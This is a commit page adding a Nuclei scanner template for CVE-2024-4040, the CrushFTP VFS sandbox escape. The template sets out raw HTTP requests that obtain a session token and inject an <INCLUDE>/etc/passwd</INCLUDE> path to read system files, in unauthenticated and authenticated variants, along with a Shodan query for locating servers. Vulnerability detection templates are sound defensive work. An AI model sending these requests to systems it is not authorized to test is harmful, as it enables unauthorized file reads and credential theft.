Merge pull request #9631 from projectdiscovery/CVE-2024-4040
Create CVE-2024-4040.yaml (CrushFTP VFS Sandbox Escape 🔥 )
patch-2
commit
6929138198
|
@ -0,0 +1,124 @@
|
||||||
|
id: CVE-2024-4040
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CrushFTP VFS - Sandbox Escape LFR
|
||||||
|
author: DhiyaneshDK,pussycat0x
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
|
||||||
|
impact: |
|
||||||
|
Successful exploitation could lead to unauthorized access to sensitive data.
|
||||||
|
remediation: |
|
||||||
|
Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2024-4040.
|
||||||
|
reference:
|
||||||
|
- https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
|
||||||
|
- https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update
|
||||||
|
- https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/
|
||||||
|
- https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||||
|
cvss-score: 10
|
||||||
|
cve-id: CVE-2024-4040
|
||||||
|
cwe-id: CWE-94,CWE-1336
|
||||||
|
epss-score: 0.016
|
||||||
|
epss-percentile: 0.87316
|
||||||
|
cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
vendor: crushftp
|
||||||
|
product: crushftp
|
||||||
|
shodan-query: html:"CrushFTP"
|
||||||
|
tags: cve,cve2024,lfr,crushftp,vfs,kev
|
||||||
|
|
||||||
|
flow: |
|
||||||
|
if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) {
|
||||||
|
// if username or password is not provided, run unauthenticated exploit
|
||||||
|
http("unauth-exploit")
|
||||||
|
} else {
|
||||||
|
// if username and password is provided, run login script and authenticated exploit
|
||||||
|
http("login") && http("auth-exploit")
|
||||||
|
}
|
||||||
|
|
||||||
|
http:
|
||||||
|
# unauthenticated exploit
|
||||||
|
- id: unauth-exploit
|
||||||
|
raw:
|
||||||
|
- |
|
||||||
|
GET /WebInterface/ HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
- |
|
||||||
|
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_2
|
||||||
|
words:
|
||||||
|
- "root:x:"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/xml"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: auth
|
||||||
|
internal: true
|
||||||
|
part: header_1
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'currentAuth=([0-9a-zA-Z]+)'
|
||||||
|
# login script
|
||||||
|
- id: login
|
||||||
|
raw:
|
||||||
|
- |
|
||||||
|
GET /WebInterface/ HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
- |
|
||||||
|
POST /WebInterface/function/ HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Length: 111
|
||||||
|
Origin: {{RootURL}}
|
||||||
|
Referer: http://{{RootURL}}/WebInterface/login.html
|
||||||
|
|
||||||
|
command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_2
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- "<response>success</response>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header_2
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- "text/xml"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: auth
|
||||||
|
internal: true
|
||||||
|
part: header_2
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'currentAuth=([0-9a-zA-Z]+)'
|
||||||
|
# authenticated exploit
|
||||||
|
- id: auth-exploit
|
||||||
|
raw:
|
||||||
|
- |
|
||||||
|
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "root:x:"
|
Loading…
Reference in New Issue